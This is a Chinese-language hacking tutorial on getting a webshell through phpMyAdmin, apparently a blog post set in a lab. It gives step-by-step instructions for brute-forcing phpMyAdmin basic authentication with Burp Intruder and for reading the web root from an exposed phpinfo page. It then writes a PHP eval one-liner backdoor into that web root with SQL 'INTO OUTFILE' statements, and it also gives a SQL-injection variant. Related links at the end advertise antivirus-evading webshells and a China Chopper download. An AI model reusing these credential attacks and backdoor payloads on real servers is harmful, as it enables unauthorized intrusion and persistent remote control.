WEBSHELL姿势之SQL一句话
之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就是通过phpMyAdmin来实现。
一般来说要利用SQL来实现一句话,有如下几种情况:
1.存在sql注入,在没有字符处理时可直接写入一句话(如Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/shell.php');
2.利用phpMyAdmin写入一句话(前提登录phpMyAdmin)
3.其次利用注入登录应用系统,发现应用系统的其它漏洞,完成getshell。
0x00 实验环境
1.一个安装phpMyAdmin的windows环境
2.使用工具burpsuit(可使用其他相关工具替换)
0x01 发现phpMyAdmin
输入ip,我们发现应用是一个后台登录系统,使用burpsuit代理并将目标网站发送至spider进行网页爬取,在target中查看网站目录(适当调整fitler可显示多个目录)
0x02 暴力破解
我们访问目标网站http://10.1.1.10/phpMyAdmin,发现它需要认证(basic认证)
我们先尝试一下密码,并使用burpsuit查看发送的包信息
其中,YWRtaW46MTIzNDU2就是我们输入的用户名和密码BASE64格式,解码后为:admin:123456
我们直接把数据包发送至intruder模块就行暴力破解,配置如下:
1.仅设置YWRtaW46MTIzNDU2为payload maker
2.设置payload type为Custom iterator
3.通过load加载常用用户名进position1列表,配置position separator为:(冒号)
4.切换到position2,通过load加载常用口令进position2列表
5.在payload process中添加Encode-Base64 encode
6.start attack.
通过status,我们定位到一个200 OK的包,解码得到root:1234567890,登录
0x03 写入一句话
在写一句话之前,我们要先了解mysql写文件的基本语句:
select * from test into outfile '/xxx/xxx/test.txt'
写文件我们大致了解了,但是我们还缺少应用的路径,这里我们通过暴露的phpinfo文件得到了应用路径C:/xampp/xampp/htdocs
最后我们的一句话木马sql如下:
Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES("<?php @eval($_POST['6um1n']);?>"); //把php一句话木马插入到temp表
Select cmd from temp into out file 'C:/xampp/xampp/htdocs/shell.php'; //查询temp表中的一句话并把结果导入到shell.php
Drop TABLE IF EXISTS temp; //删除temp#以上也可简化为:
#Select "<?php @eval($_POST['6um1n']);?>" into outfile 'C:/xampp/xampp/htdocs/shell.php'
执行sql
0x04 菜刀
webshell至此完结,之后还可以完成提权等测试,这里就不再继续了。
WEBSHELL姿势之SQL一句话相关推荐
- 过新版狗php一句话,整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)...
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话) 发布时间:2020-06-20 00:54:04 来源:51CTO 阅读:3175 作者:gu ...
- 如何以正确地姿势AK SQL查询50题(精华篇)
前言------ AK: ALL Killed 这学期学数据库系统概论,作为一个初学者,必须先熟练掌握SQL的基本查询语句,在完成了老师的SQL50题之后,我把我自己地AK姿势记录下来, 便于回忆之余 ...
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567
- SQL注入上传一句话木马
利用sql注入上传一句话木马 导读 1. sql注入的危害 2. 文件写入 2.1 webshell.一句话木马.后门 webshell(大马) 一句话木马 木马文件的危害 2.2 文件写入的前提条件 ...
- linux脚本读取mssql数据库,WebShell通过SQL语句管理MSSQL
最近在做一个网络安全相关项目的渗透测试,在拿到了服务器的webshell之后,需要进一步渗透,服务器上有较高权限的软件只剩SQL Server 2005了,而且在webshell中通过SQL Serv ...
- sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...
4.4 使用sqlmap直连MSSQL获取webshell或权限 在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密 ...
- 使用sqlmap直连数据库获取webshell
在有些场景下,需要通过mysql直接连接来获取权限,例如通过暴力破解.嗅探等方法获取了账号及口令,服务器有可能未开放web服务. 0X001 适用场景 1.获取了Mysql数据库root账号以及密码. ...
- 信安小白,一篇博文讲明白上传漏洞——获得shop靶机的Webshell
实验环境:Win7 上传漏洞--获得shop靶机的Webshell 系列博文 前言 Webshell--脚本攻击工具 1. Webshell 工具举例 2. 如何获得Webshell 3. 上传检测 ...
- webshell原理
(源自摘抄整理) https://www.91ri.org/11494.html Webshell实现与隐藏探究 一.什么是webshell webshell简介 webshell,顾名思义:web指 ...
最新文章
- 创业3年!猎头加价50%!一半中层骨干被挖走,研发就剩2个应届生!绝户套餐真够狠的!...
- Visual Transformers: Token-based Image Representation and Processing for Computer Vision
- JQuery:JQuery添加元素
- 外部中断---STM32F1
- maven POM.xml内的标签大全详解
- 创建一个守护进程来监听服务进程的异常状态_用 C# 来守护 Python 进程
- 老年手机英文改中文_不服来战:“老年人才用9键!”
- Maven学习总结(53)——利用Maven插件构建镜像进行持续交付中的版本号管理
- jQuery.获取子节点
- 嵌入式大佬 | 嵌入式C语言知识点万字总结
- 立即收藏!2019前端工程师如何应对裁员潮?
- 北京双线机房的优缺点分析
- 湖南大学计算机专业推免生,湖南大学2018年招收推荐免试攻读研究生简章
- 以前收入高,但毫无上进心,40岁一身房贷,被裁后找个小公司,天天担心试用期过不了,焦虑地睡不着!...
- php怎么做注册短信验证码
- 在线ico图标制作、python代码实现ico格式转换
- Unhandled Exception:System.DllNotFoundException: Unable to load DLLquot;**quot;:找不到指定的模块
- 原生Android设置sim卡锁定,开启SIM卡密码保护
- 【csdn涨粉秘籍】亲身体验从一年才涨80粉到20天涨粉800多,规则内设置,一个步骤助你快速涨粉
- 中枢模式发生器(CPG)